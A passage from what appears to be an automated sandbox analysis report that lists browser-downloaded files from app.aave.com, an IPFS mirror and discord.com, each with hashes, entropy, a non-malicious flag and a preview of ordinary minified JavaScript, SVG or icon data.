                                                                                                                                                                                                                                                  Entropy (8bit):5.475675515582932
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:E7ibegv0VRKGayRI7OzFxE1LWOBEAVyQGQYGbYsieX:E7hlI7Ozcj+QPYGbFX
                                                                                                                                                                                                                                                  MD5:C276816BA15AAC6C0F054FFA7EDD522C
                                                                                                                                                                                                                                                  SHA1:03DD06A3487CAB788E6EEA217246098116F9A316
                                                                                                                                                                                                                                                  SHA-256:C868EE2AEFAF99D69FFF9907D39957BF18DA5E6806090B391C7E0A2C50CBCC36
                                                                                                                                                                                                                                                  SHA-512:55EE595DD9DE301B44F4A4C02521A84A7983C26CFAB69899F01CB79AEBBDFF9FA8F4285EECBECD34893B367335B5E0DD06A343A9061EA97A51D202E4FCBF0897
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6504],{89722:function(e,t,r){r.d(t,{Z:function(){return b}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),s=r(94780),l=r(81719),c=r(78884),u=r(36622),d=r(34867);function m(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const f=["baseClassName","className","color","component","fontSize"],v=(0,l.ZP)("span",{name:"MuiIcon",slot:"Root",overridesResolver:(e,t)=>{const{ownerState:r}=e;return[t.root,"inherit"!==r.color&&t[`color${(0,u.Z)(r.color)}`],t[`fontSize${(0,u.Z)(r.fontSize)}`]]}})((({theme:e,ownerState:t})=>({userSelect:"none",width:"1em",height:"1em",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):64626
                                                                                                                                                                                                                                                  Entropy (8bit):6.02769221429177
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:ZQeY8TVOfra3xt+FSDOBBN+0aVWBU3shY3AJFRt2H/ALdlEBR9E3:ZQRsOfl0qe0akBU3su3Af/2HIp2y3
                                                                                                                                                                                                                                                  MD5:7344A5F876779F04558C37786F08EE01
                                                                                                                                                                                                                                                  SHA1:52461CCAE0CEEC68277D1B10F08FDE73B66CA2D5
                                                                                                                                                                                                                                                  SHA-256:E5EC6630C9522E637813EB49BFF3042C67251403713CBB9630B3C9CE9CCAE129
                                                                                                                                                                                                                                                  SHA-512:879955EA34C2D963D6832427FBD27175488ED13D48B749056774EAD3C899E10E7F2EABACE5E26D0F3BEF207082409242029E8FE31125EB2E2742CD09D670842E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/icons/tokens/stkbptv2.svg
                                                                                                                                                                                                                                                  Preview:<svg width="254" height="254" viewBox="0 0 254 254" fill="none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="#9391F7" style="fill:color(display-p3 .5765 .5686 .9686);fill-opacity:1" d="M0 0h254v254H0z"/><circle cx="127" cy="127" r="119" fill="#fff" stroke="#9391F7" style="fill:#fff;fill-opacity:1;stroke:color(display-p3 .5765 .5686 .9686);stroke-opacity:1" stroke-width="16"/><path fill="url(#a)" d="M36 110h87v88H36z"/><rect x="131" y="110" width="87" height="88" rx="43.5" fill="url(#b)"/><rect x="82" y="29" width="87" height="88" rx="43.5" fill="url(#c)"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#d" transform="matrix(.002 0 0 .00197 -.006 0)"/></pattern><pattern id="b" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#e" transform="matrix(.00506 0 0 .005 -.006 0)"/></pattern><pattern id="c" patternContentUnits="objectBoundingBox" width="1" height="1"><use
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14246), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):14246
                                                                                                                                                                                                                                                  Entropy (8bit):5.3643902184432255
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:fm3oTpXrEoT1by1pnH8hNsQBSoz3zFrSzc4TaOab/U:fm3odEop0nS73JrSfTabU
                                                                                                                                                                                                                                                  MD5:87FD8D4586B99C270AB4C8E8D5B5E3E2
                                                                                                                                                                                                                                                  SHA1:A65991867D10093B1BCFAAA8761339BDF811A72E
                                                                                                                                                                                                                                                  SHA-256:F3144D994DFBDCF2EE26BE5C1058846EE1F1469B94FF6047865C44184F1510FF
                                                                                                                                                                                                                                                  SHA-512:791E8678AF3D79891C41014EA9755D15CA792F14526177B4959C3D7C3A21B01A712FFB6F2AD744DD1117853D6CEAD86E4825F0DA10F41679E4F60E1DA25B4FCD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5780],{25935:function(e,t,r){r.d(t,{B:function(){return v}});var n=r(59499),a=r(4730),s=r(49501),i=r(30120),o=r(91655),u=r(70794),c=r(57609),l=r(41024),p=r(58527),d=r(85893),m=["loading","outputAmountUSD","inputAmountUSD"];function f(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function h(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?f(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var v=function(e){var t=e.loading,r=e.outputAmountUSD,n=e.inputAmountUSD,f=(0,a.Z)(e,m),v=new u.Z(r).minus(n),x=n&&"0"!==n?v.d
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16629), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):16629
                                                                                                                                                                                                                                                  Entropy (8bit):5.3453787960037
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:Twub6zNykQupfSJ/Ixue2FDZh0e3UjHyT5LdB6je:1c0J/IQea1aW5T6je
                                                                                                                                                                                                                                                  MD5:8F8A172D2AA3FC94F0F3888BD2CCF542
                                                                                                                                                                                                                                                  SHA1:DCE3BEAFAC9B31349387E4BFC0A63D134F79615D
                                                                                                                                                                                                                                                  SHA-256:B70612C92071739C483FD36E97F42C089F49DD9FAE59E1AB05874C18913880C3
                                                                                                                                                                                                                                                  SHA-512:9042B00469188511FC857C88370410D5C51B38A4C0F5E1B40BCE320535CA572992F79A8168BA6F8D99131DC42994913B4055B1ABA3570B5FEB487FDAC02E0FD7
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7416],{96875:function(e,n,r){r.d(n,{o:function(){return h}});var t=r(59499),i=r(4730),o=r(49501),c=r(1279),a=r(62097),s=r(30120),l=r(29630),u=r(75084),d=r(70794),x=r(41024),p=r(85893),f=["value","onInfoClick"];function j(e,n){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var t=Object.getOwnPropertySymbols(e);n&&(t=t.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable}))),r.push.apply(r,t)}return r}function v(e){for(var n=1;n<arguments.length;n++){var r=null!=arguments[n]?arguments[n]:{};n%2?j(Object(r),!0).forEach((function(n){(0,t.Z)(e,n,r[n])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):j(Object(r)).forEach((function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}))}return e}var h=function(e){var n=e.value,r=e.onInfoClick,t=(0,i.Z)(e,f),j=(0,a.Z)().palette,h=Number((0,c.hE)(n).toFixed(2,d.Z.ROUND_DOWN)),m="";ret
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9656), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9656
                                                                                                                                                                                                                                                  Entropy (8bit):5.443759738167968
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:I0yPm20ovrtTveOqr9bhyQlHFtyHD8EHlymg4kLQVx+bqfMWU/aMWYrWLmQUpKKn:HyPm2pvrtTvePVhBHFIHpw0kUTw2q/ay
                                                                                                                                                                                                                                                  MD5:B1AD15399D5079C8C117C4BC6FBD5F17
                                                                                                                                                                                                                                                  SHA1:576B8FC56B4E79AA8CC6801D31245D38C49AF051
                                                                                                                                                                                                                                                  SHA-256:DE29546C84A2418D2F819A5A381D70CBB817782FFAA404117ED4B5CE740C937B
                                                                                                                                                                                                                                                  SHA-512:4A2B27F3AA0F1D64C494C08C3399D56E8D15FB8439042BA40F217A0061906ADECE637D14EDCB91374815B138848FA06E01B759B60D18E6C6A0006B3AE015AEB2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/3645-9203dd9404a3977e.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3645],{62753:function(e,t,o){var n=o(64836);t.Z=void 0;var r=n(o(64938)),i=o(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},75158:function(e,t,o){o.d(t,{Z:function(){return C}});var n=o(63366),r=o(87462),i=o(67294),a=o(86010),s=o(94780),c=o(41796),l=o(37743),d=o(54235),u=o(85893),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):109609
                                                                                                                                                                                                                                                  Entropy (8bit):5.402692401363658
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:QCBKa1GvPzsGolumyOSsN5VYpLUBDL2QPidmHTRWipxpoAkF+d1j0o:1B9MT1a5YpL5kl9pxp0a1jb
                                                                                                                                                                                                                                                  MD5:651A7D831E29418FE8534CA30698909E
                                                                                                                                                                                                                                                  SHA1:FEFFB7CB5F92239332C1F759B15700C45A088026
                                                                                                                                                                                                                                                  SHA-256:BC2C14A038FBD74724FFC9F6907EF35AE2955FDCACE8D694BF22355624B7E521
                                                                                                                                                                                                                                                  SHA-512:4E147073159BCB18EA5403F74E1F9F34FE57A66AE60C967F622A4F77D1E04AA5526D9E638DC993B718CFB352BD7AEEB36E8047F6DDAA9317DDD7833586D1B0FC
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["96427"],{473452:function(e,t){"use strict";t.Z=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*1540483477&65535)<<16)),n-=4,++r;switch(n){case 3:o^=(255&e.charCodeAt(r+2))<<16;case 2:o^=(255&e.charCodeAt(r+1))<<8;case 1:o^=255&e.charCodeAt(r),o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)}return o^=o>>>13,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16),((o^=o>>>15)>>>0).toString(36)}},230371:function(e,t){"use strict";t.Z=function(e){var t={};return function(n){return void 0===t[n]&&(t[n]=e(n)),t[n]}}},184826:function(e,t){"use strict";t.Z=function(e){function t(e,t,o){var r=t.trim().split(h);t=r;var i=r.length,a=e.length;switch(a){case
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (12936), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):12936
                                                                                                                                                                                                                                                  Entropy (8bit):5.553604676962967
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:xyPmhrU+P+QdVeiHXerPdZ5w3UsN1bh1pUMJwfN/zH:xyPsU+WuVecXW3JsvZUTfVzH
                                                                                                                                                                                                                                                  MD5:E10EC769BF7DE9EFFD288CE92B44858A
                                                                                                                                                                                                                                                  SHA1:23ED148516A9FD7A121A2BBB3B24A9FCC4348D97
                                                                                                                                                                                                                                                  SHA-256:6E6F366895D3E4D6D7134AD68E405FE0595003D02B5CF6A751BAD2692A972284
                                                                                                                                                                                                                                                  SHA-512:C49C1FC6433A23EC3782649FF44B7167512DAFA702D8704B3A4C8E4C5ED81F7D79A267185B0DF8EC2013B602A62EC18F6414E3E80C73EC2808F2042DB1BC668E
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8701],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),s=r(85893),i=(0,o.default)((0,s.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},9144:function(e,t,r){var n=r(63366),o=r(87462),s=r(67294),i=r(95408),a=r(98700),c=r(39707),l=r(59766),d=r(81719),u=r(78884),p=r(85893);const x=["component","direction","spacing","divider","children"];function m(e,t){const r=s.Children.toArray(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(s.cloneElement(t,{key:`separator-${o}`})),e)),[])}const f=(0,d.ZP)("div",{name:"MuiStack",slot:"Root",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10134), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                                                                                                  Entropy (8bit):5.3248676773482275
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:w7g8F82kZbk9/obvQw++1R5j3FvtWU/98iqcjJLmLLx5pOsYU3hJo:w7GbbkxyzLR3FvN/6ojJGbYsL4
                                                                                                                                                                                                                                                  MD5:294B8F234E5006980C29F7309DF45D75
                                                                                                                                                                                                                                                  SHA1:FE4B0BE3402F3F26499D388F52F9FBD041D18D06
                                                                                                                                                                                                                                                  SHA-256:BA9F3DFF2E49BAF1CB2BAEB27C495A08630C569B3B0C1BD71DAE366574C2E37C
                                                                                                                                                                                                                                                  SHA-512:B071E5FC210E35015E3C86AA10FD547C2797425F0C0B54E7810CE934C9F14A7A0820E4E8EFA5BBFCA5C77B6B0CF0DE664DA3852C7FC623E5FD80B202BE9577FD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[82],{833:function(e,t,r){r.r(t),r.d(t,{BigNumber:function(){return n.O$},formatFixed:function(){return o.S5},FixedFormat:function(){return o.xO},FixedNumber:function(){return o.xs},parseFixed:function(){return o.Ox},_base16To36:function(){return n.t2},_base36To16:function(){return n.g$}});var n=r(2593),o=r(20335)},78435:function(e,t,r){r.r(t),r.d(t,{logger:function(){return n.k},Wordlist:function(){return n.D},wordlists:function(){return o.E}});var n=r(48812),o=r(10234)},89722:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(87462),o=r(63366),i=r(67294),s=r(86010),a=r(94780),c=r(81719),l=r(78884),u=r(36622),d=r(34867);function f(e){return(0,d.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var p=r(85893);const m=["baseClassName","className","color","component","fontSiz
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (14246), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):14246
                                                                                                                                                                                                                                                  Entropy (8bit):5.3643902184432255
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:fm3oTpXrEoT1by1pnH8hNsQBSoz3zFrSzc4TaOab/U:fm3odEop0nS73JrSfTabU
                                                                                                                                                                                                                                                  MD5:87FD8D4586B99C270AB4C8E8D5B5E3E2
                                                                                                                                                                                                                                                  SHA1:A65991867D10093B1BCFAAA8761339BDF811A72E
                                                                                                                                                                                                                                                  SHA-256:F3144D994DFBDCF2EE26BE5C1058846EE1F1469B94FF6047865C44184F1510FF
                                                                                                                                                                                                                                                  SHA-512:791E8678AF3D79891C41014EA9755D15CA792F14526177B4959C3D7C3A21B01A712FFB6F2AD744DD1117853D6CEAD86E4825F0DA10F41679E4F60E1DA25B4FCD
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/5780.fe39358b1d632e65.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5780],{25935:function(e,t,r){r.d(t,{B:function(){return v}});var n=r(59499),a=r(4730),s=r(49501),i=r(30120),o=r(91655),u=r(70794),c=r(57609),l=r(41024),p=r(58527),d=r(85893),m=["loading","outputAmountUSD","inputAmountUSD"];function f(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function h(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?f(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):f(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var v=function(e){var t=e.loading,r=e.outputAmountUSD,n=e.inputAmountUSD,f=(0,a.Z)(e,m),v=new u.Z(r).minus(n),x=n&&"0"!==n?v.d
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):856
                                                                                                                                                                                                                                                  Entropy (8bit):4.812241925125052
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tu1F4fZb+mw6jmwoTHbASOgo5+TUoEyUv:0i+SSASO4v+v
                                                                                                                                                                                                                                                  MD5:6B541CC9F994BD676B0D839B4CB858C7
                                                                                                                                                                                                                                                  SHA1:6F9F9268B497A8B202C8CB3A643171CD81CA4CD1
                                                                                                                                                                                                                                                  SHA-256:359229EC1AF95BD4436F9FDF2E73CF496012245C217B4B9C156FB486AC1F974B
                                                                                                                                                                                                                                                  SHA-512:046064CD0EB75F4253922D81E683206F6CD812A9598C60DBF686784518802EAC4D53D243E5BA810A36FF31775B20336FCC2C59E170D8A0AA98D7BF2AC87ED17B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 300 300"><defs><style>.cls-2{stroke-width:0;fill:#fff}</style></defs><circle cx="150" cy="150" r="150" style="stroke-width:0;fill:#28d358"/><path class="cls-2" d="M94.84 130.42c0 13.49 10.93 24.42 24.42 24.42s24.42-10.93 24.42-24.42S132.75 106 119.26 106s-24.42 10.93-24.42 24.42Zm61.55 0c0 13.49 10.93 24.42 24.42 24.42s24.42-10.93 24.42-24.42S194.3 106 180.81 106s-24.42 10.93-24.42 24.42Z"/><path class="cls-2" d="M265.73 245.44v-83.23h-31.4c-6.35 41.98-40.98 72.56-84.33 72.56-47.9 0-86.17-37.33-86.17-86.14s38.27-86.84 86.18-86.84c41.76 0 76.18 28.91 84.34 68.65h31.4c-8.59-56.5-57.89-99.77-115.75-99.77-63.93 0-115.75 52.82-115.75 117.95S86.07 266.57 150 266.57c40.23 0 68.28-18.63 85.49-47.97.41.12.83.21 1.22.33v53.48a150.426 150.426 0 0 0 29.02-26.98Z"/></svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16561867
                                                                                                                                                                                                                                                  Entropy (8bit):5.8125885301397435
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:393216:Ac60nOOpgxw0Grvo5sdhNNWiZH+lKxSrHii3qcaWLxSkHsKBIV+ztWQ:crpB8+zF
                                                                                                                                                                                                                                                  MD5:BEF713E90728AA2AF9B9FD1CDE3D9D02
                                                                                                                                                                                                                                                  SHA1:42EC2FC039E559A8ED734582BD273328BB82502F
                                                                                                                                                                                                                                                  SHA-256:2EA19AF0D211F1AE5047DAB2F796B55E3433FD58B3B1EF33CD5C02F774FB2CF7
                                                                                                                                                                                                                                                  SHA-512:A632C16CBC7E515437A9268710AB7D3154558FBFA9B54C14E7EFFD0C86985A7358C42A2FAAA1055A0A2B2365913DB63981D1E34C91DBE18939B54D5D2D6A3005
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/webMinimal.9d2ce1b93ad02861f9cf.js
                                                                                                                                                                                                                                                  Preview:(()=>{var __webpack_modules__={385007:function(e,t,n){var r={"./de.jsona":["644753","30244"],"./zh-CN.jsona":["494062","56446"],"./da.jsona":["44867","57387"],"./el.jsona":["581144","55601"],"./tr.jsona":["146878","84385"],"./es-ES.jsona":["872550","45747"],"./hr.jsona":["403530","29924"],"./cs.jsona":["753771","87233"],"./fi.jsona":["554545","7402"],"./es-419.jsona":["39227","59729"],"./ja.jsona":["588688","7728"],"./pt-BR.jsona":["246297","394"],"./ro.jsona":["37190","53269"],"./sv-SE.jsona":["335417","11193"],"./ru.jsona":["809464","12611"],"./vi.jsona":["139107","45576"],"./id.jsona":["492248","77800"],"./it.jsona":["515630","78670"],"./uk.jsona":["167111","58548"],"./lt.jsona":["877749","44754"],"./pl.jsona":["477384","60878"],"./hu.jsona":["107425","98570"],"./nl.jsona":["432763","41588"],"./th.jsona":["182260","49827"],"./bg.jsona":["251927","20575"],"./fr.jsona":["570173","99450"],"./zh-TW.jsona":["592369","30684"],"./hi.jsona":["629869","22732"],"./en-GB.jsona":["569249","9933
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                                                                                  Entropy (8bit):5.602109857496208
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:XJp70f+qYRe9bYPNL9cQ7Hd77GDNEOI7KL8ME9q:XJpTFRe5YPNLj7yREerE
                                                                                                                                                                                                                                                  MD5:77AAE561D0D3B45D1837EAC14665B410
                                                                                                                                                                                                                                                  SHA1:73F80F03D47B7A8A89007AC14DA0D11BC5180421
                                                                                                                                                                                                                                                  SHA-256:23B36858DBEB7F1A985849BDA8186DB9EDF70114EE7FBA7CFD6CC8CFFE8DF555
                                                                                                                                                                                                                                                  SHA-512:8D4BABFF7AD8FF3B8B687EB6F4B7145363343694756EC517F9836E66411C3FB1C10A61293C6AA2E1F80EF5AFB0F66F66B9C9DA0C285E9CBED6366E43A87C7BDA
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:............ .h.......(....... ..... ..........................3..6..;...?...D...G...L...P...U...X...]...a...f...i...n...r..6..;..]..V...G...L...P...T...X...]...a...e...r......r...v..;...?...........L...P...U...X...]...a...f...i..............~z...?...C.........i...T...X...]...a...e...i...t..........~z..{....D...G..v..........X...]...a...f...i...n............{...x....G...L...P...........a...a...e...i...n...r..........~...w...u....L...P...U.............f...i...n...r..............x...u...q....P...T..r....................r...v..............u...q...n....U...X..........................z..............u...q...n...j....X...]...e....................~z............q...n...j...g....]...a...f...i...n...........}..{...........t...n...j...h...d....a...e...i...n...r........................n...j...g...d...a....f...i...n...r...w..........................j...h...d...a...]....i...n...r...v..~z..{...................j...g...d...a...]...Z....n...r...w..~z..{...x...................h
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11171), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11171
                                                                                                                                                                                                                                                  Entropy (8bit):5.421243293972017
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:ZqCc0sGOA7RCzeQ5t2W++bzJuCC66bc66WzTXAQErzkK6polUy6ANADSY6Uolq+Z:LaGSXNFjubAWH1ao/yrSua+aaTEKPGu
                                                                                                                                                                                                                                                  MD5:3DBBBE5E97A8B0B863FA9CDCAEAF7255
                                                                                                                                                                                                                                                  SHA1:B408B258D2A7364724F7566A23F6D6CBBD44828A
                                                                                                                                                                                                                                                  SHA-256:0F6ACC0732DBCFD65ADA5593CADA32BE800B526FBD9A63C25159F1AAFCF15EB8
                                                                                                                                                                                                                                                  SHA-512:7B3A198B7181B9771CC68CD4D65DE701CA7F0519E2A0F1596660F68E7B0DC49CD8A194CE89D63D48917517582C0D91FB32883487CE6B214E5DDD60385E829F50
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
